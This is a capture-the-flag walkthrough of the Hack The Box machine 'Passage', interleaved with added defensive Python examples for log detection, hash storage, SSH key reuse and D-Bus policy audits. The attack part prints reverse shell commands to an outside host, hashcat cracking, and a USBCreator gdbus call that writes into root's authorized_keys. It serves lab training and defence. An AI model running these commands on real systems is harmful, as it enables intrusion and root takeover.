Hack The Box — Passage

Hey folks, today we have a new machine from Hack The Box, “Passage”, a medium box with a new technique in the privilege escalation part. Let’s take a look at its info.

As usual, we follow a fixed set of steps to pwn any machine:

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

After finishing these steps we will have all the information we need, so stay calm and keep reading :)

In this step we aim to collect all the information we can about the target: its open ports, the login mechanisms and their security, directories, OS version, service versions, etc.

We start by scanning all ports to discover which ones are open and where we can get into this machine.

nmap -sS -sV -T4 -O

We have only 2 open ports, 22 and 80, so we will start by scanning the website on port 80.

I’ve already searched for public exploits for this Apache version, but there’s nothing interesting.

We have a template website with no interesting information, and if you look at the upper right side there’s no redirection happening, so we will start checking the source code.

We have a CuteNews directory, and after searching for it, I found that it’s a CMS (Content Management System).

Let’s try to access it

We have a login portal, and the CMS version is CuteNews 2.1.2.

Let’s search for a public exploit for this version.

We have an authenticated arbitrary file upload vulnerability, and from Google searching

we also find exploit code for CVE-2019-11447, which requires us to be authenticated.

In this step we aim to scan and verify all the info collected in the previous one.

So, create an account and try to run the exploit.

It uploads a PHP file that executes the contents of the cmd parameter on the system. Let’s access the uploaded file and run a reverse shell command.

As you can see, when I entered whoami it was executed on the server, so we have OS command injection through this variable; let’s use it to open a shell.

Let’s execute nc 10.10.xx.xx 1234 -e /bin/bash or bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1, URL-encoded.

After sending it to the server while listening on that port with netcat,

I’ve gained a shell :)
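From the defender’s side, the same upload-then-execute sequence leaves a clear trail in the web server access log: a PHP script requested from the upload directory, followed by a URL-encoded reverse shell in its parameter. This is an added example, not code from the post; the log lines, IPs and the upload path are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the box); upload path and IPs are placeholders.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2021:10:00:00 +0000] "GET /CuteNews/index.php HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2021:10:00:10 +0000] "POST /CuteNews/index.php?mod=main&opt=personal HTTP/1.1" 302 0
10.10.14.5 - - [01/Jan/2021:10:00:20 +0000] "GET /CuteNews/uploads/placeholder.php?cmd=whoami HTTP/1.1" 200 12
10.10.14.5 - - [01/Jan/2021:10:00:30 +0000] "GET /CuteNews/uploads/placeholder.php?cmd=bash%20-i%20%3E%26%20/dev/tcp/10.10.14.5/1234%200%3E%261 HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
REVERSE_SHELL_PATTERNS = [
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat -e reverse shell"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash"),
]
RECON_COMMANDS = re.compile(r"^(whoami|id|uname|cat|ls)\b")


def classify_request(path):
    """Reasons a request looks like command execution through an uploaded PHP file."""
    reasons = []
    url, _, query = path.partition("?")
    if url.lower().endswith(".php") and "/uploads/" in url.lower():
        reasons.append("PHP script requested from the upload directory")
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        decoded = unquote_plus(value)  # the payload arrives URL-encoded, as in the post
        for pattern, label in REVERSE_SHELL_PATTERNS:
            if pattern.search(decoded):
                reasons.append(f"{label} in parameter {key}")
        if RECON_COMMANDS.match(decoded.strip()):
            reasons.append(f"shell command in parameter {key}")
    return reasons


def scan_log(text):
    """Return (line number, path, reasons) for every suspicious request in the log."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = classify_request(match.group("path"))
        if reasons:
            hits.append((number, match.group("path"), reasons))
    return hits


if __name__ == "__main__":
    for number, path, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number}: {path}\n  " + "\n  ".join(reasons))
```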

Let’s escalate our privileges to another user.

Let’s check the files of /var/www/html/CuteNews/cdata/users

We have multiple PHP files; start with the larger ones, since they may contain juicy information.

These 2 files contain base64 data, which we can decode with any online or offline tool:

echo "the_encoded_text_here" | base64 -d

After decoding we have the passwords for paul and nadav, but they’re hashed.

First we need to identify the hash type using Hash Analyzer.

They’re SHA2-256.

Now we need to crack them using any online lookup tool, hashcat or john:

hashcat -m 1400 paul.hash rockyou.txt

The result is paul:atlanta1
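The reason the hash falls so quickly is that it is plain, unsalted SHA-256, so each wordlist candidate costs one hash call. The added example below (not code from the post) decodes a constructed base64 record in the spirit of the cdata/users files, guesses the hash type by length as a hash analyzer does, checks it against a small wordlist, and contrasts it with salted scrypt storage; the record layout is illustrative and the only real value reused is the password the post recovered.

```python
import base64
import hashlib
import os
import re

ALGOS_BY_LEN = {32: ["md5"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}
HEX_RUN = re.compile(r"\b[0-9a-f]{32,128}\b")


def constructed_user_blob():
    """Constructed stand-in for a cdata/users record (illustrative layout, not CuteNews' exact format)."""
    digest = hashlib.sha256(b"atlanta1").hexdigest()  # the password the post recovered for paul
    record = 'a:2:{s:4:"name";s:4:"paul";s:4:"pass";s:64:"%s";}' % digest
    return base64.b64encode(record.encode()).decode()


def extract_hashes(blob_b64):
    """Decode a base64 record (echo ... | base64 -d) and pull out anything shaped like a hex digest."""
    text = base64.b64decode(blob_b64).decode("utf-8", errors="replace")
    return [h for h in HEX_RUN.findall(text) if len(h) in ALGOS_BY_LEN]


def guess_hash_type(digest):
    """Length-based guess, like Hash Analyzer; 64 hex chars points at SHA-256 (hashcat -m 1400)."""
    return ALGOS_BY_LEN.get(len(digest), [])


def crack(digest, wordlist):
    """Unsalted digest: one hash per candidate, so a wordlist hit is immediate."""
    for algo in guess_hash_type(digest):
        for word in wordlist:
            if hashlib.new(algo, word.encode()).hexdigest() == digest:
                return word, algo
    return None


def hash_for_storage(password, salt=None):
    """Salted, memory-hard scrypt: the storage format a plain wordlist pass does not collapse."""
    salt = salt or os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt.hex() + "$" + key.hex()


def verify_stored(password, stored):
    salt_hex, _ = stored.split("$")
    return hash_for_storage(password, bytes.fromhex(salt_hex)) == stored
```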

We can also read the user flag (user.txt).

After that we need to get to the second user, nadav.

By enumerating paul’s home directory, I found the .ssh directory, which contains an id_rsa file.

There’s a hint in the machine discussion saying that the 2 users share everything with each other.

So let’s use it to log in as nadav.

It works, and we have only one step left to get the root account.
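The lateral move works only because paul’s key is accepted by nadav’s account, and that kind of reuse is easy to audit: fingerprint every authorized_keys entry and report keys trusted by more than one user. This is an added example, not code from the post; the two authorized_keys files and their key blobs are constructed placeholders, not real keys.

```python
import base64
import hashlib

# Constructed authorized_keys contents for two users (placeholder blobs, not real keys),
# mirroring paul's key being accepted for nadav.
PAUL_KEY = "ssh-rsa " + base64.b64encode(b"constructed-key-material-paul").decode() + " paul@passage"
NADAV_KEY = "ssh-ed25519 " + base64.b64encode(b"constructed-key-material-nadav").decode() + " nadav@passage"
SAMPLE_AUTHORIZED_KEYS = {
    "paul": PAUL_KEY + "\n",
    "nadav": "# shared with paul\n" + PAUL_KEY + "\n" + NADAV_KEY + "\n",
}
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(line):
    """SHA256 fingerprint of one authorized_keys line, in OpenSSH's display form (base64, no padding)."""
    fields = line.split()
    # Leading options such as command="..." may precede the key type; find the type field first.
    for index, field in enumerate(fields):
        if field.startswith(KEY_TYPE_PREFIXES) and index + 1 < len(fields):
            blob = base64.b64decode(fields[index + 1])
            return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return None


def parse_authorized_keys(text):
    """Fingerprints of every key line, skipping blanks and comments."""
    fingerprints = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fp = fingerprint(line)
        if fp:
            fingerprints.append(fp)
    return fingerprints


def shared_keys(files):
    """Map fingerprint -> sorted users for every key accepted by more than one account."""
    owners = {}
    for user, text in files.items():
        for fp in parse_authorized_keys(text):
            owners.setdefault(fp, set()).add(user)
    return {fp: sorted(users) for fp, users in owners.items() if len(users) > 1}


if __name__ == "__main__":
    for fp, users in shared_keys(SAMPLE_AUTHORIZED_KEYS).items():
        print(f"{fp} is accepted by: {', '.join(users)}")
```

On a real host, feed it the contents of /home/*/.ssh/authorized_keys and /root/.ssh/authorized_keys; the same fingerprints can be compared with ssh-keygen -lf output.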

Using pspy64 to watch the system processes, I noticed a process, ibus, that executes every second.

After searching for how to use it to open a shell, I found these 2 amazing resources:

The second blog is written by someone called Nadav, the machine creator.

Following the HackTricks enumeration steps, I checked the D-Bus services:

busctl list

I found that there’s a service called USBCreator that runs with root privileges.

After some searching for how to use it to get a root shell, I found that it can be used to write a file into the root directory, so I can generate my own RSA key pair and copy the public key to /root/.ssh/authorized_keys to authenticate to the system as root.

Let’s generate our RSA key pair, then copy the public key into root’s directory.

Use this command to perform the copy:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/eslam_rsa.pub /root/.ssh/authorized_keys true

Then log in to the root account using the private SSH key:

ssh -i id_rsa root@
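What made this step possible is a root-owned system bus service that any local user is allowed to send messages to. The exposure is visible in the D-Bus policy files under /usr/share/dbus-1/system.d/, and the added example below (not code from the post) audits one such file to list root-owned destinations callable from the default context; the policy text is constructed, with a second placeholder service com.example.Privileged that only root may call.

```python
import xml.etree.ElementTree as ET

# Constructed policy file in the format used under /usr/share/dbus-1/system.d/.
# com.ubuntu.USBCreator mirrors the post's finding; com.example.Privileged is a placeholder.
SAMPLE_POLICY = """<!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
    <allow own="com.example.Privileged"/>
    <allow send_destination="com.example.Privileged"/>
  </policy>
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator"/>
  </policy>
</busconfig>
"""


def audit_policy(xml_text):
    """Return {destination: owning user} for services that any local user may send to.

    Simplification: a default-context <deny send_destination=...> for the whole
    destination is treated as closing it; per-interface or per-method rules are not modelled.
    """
    root = ET.fromstring(xml_text)
    owners, allowed, denied = {}, set(), set()
    for policy in root.iter("policy"):
        context, user = policy.get("context"), policy.get("user")
        for rule in policy:
            if rule.tag == "allow" and rule.get("own"):
                owners[rule.get("own")] = user or context
            destination = rule.get("send_destination")
            if destination and context == "default":
                (allowed if rule.tag == "allow" else denied).add(destination)
    return {dest: owners.get(dest, "unknown") for dest in allowed - denied}


if __name__ == "__main__":
    for destination, owner in audit_policy(SAMPLE_POLICY).items():
        print(f"{destination}: owned by {owner}, callable by any local user")
```

Each destination this reports, such as the one the post found with busctl list, is a root-owned method surface whose handlers must enforce authorization (for example via polkit) themselves.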

If you speak Arabic, you can watch my walkthrough, in which I explain all these steps, here

If you find it helpful, kindly give me a respect here: eslam3kl — HTB

LinkedIn | GitHub | Twitter

Offensive Security Enthusiast
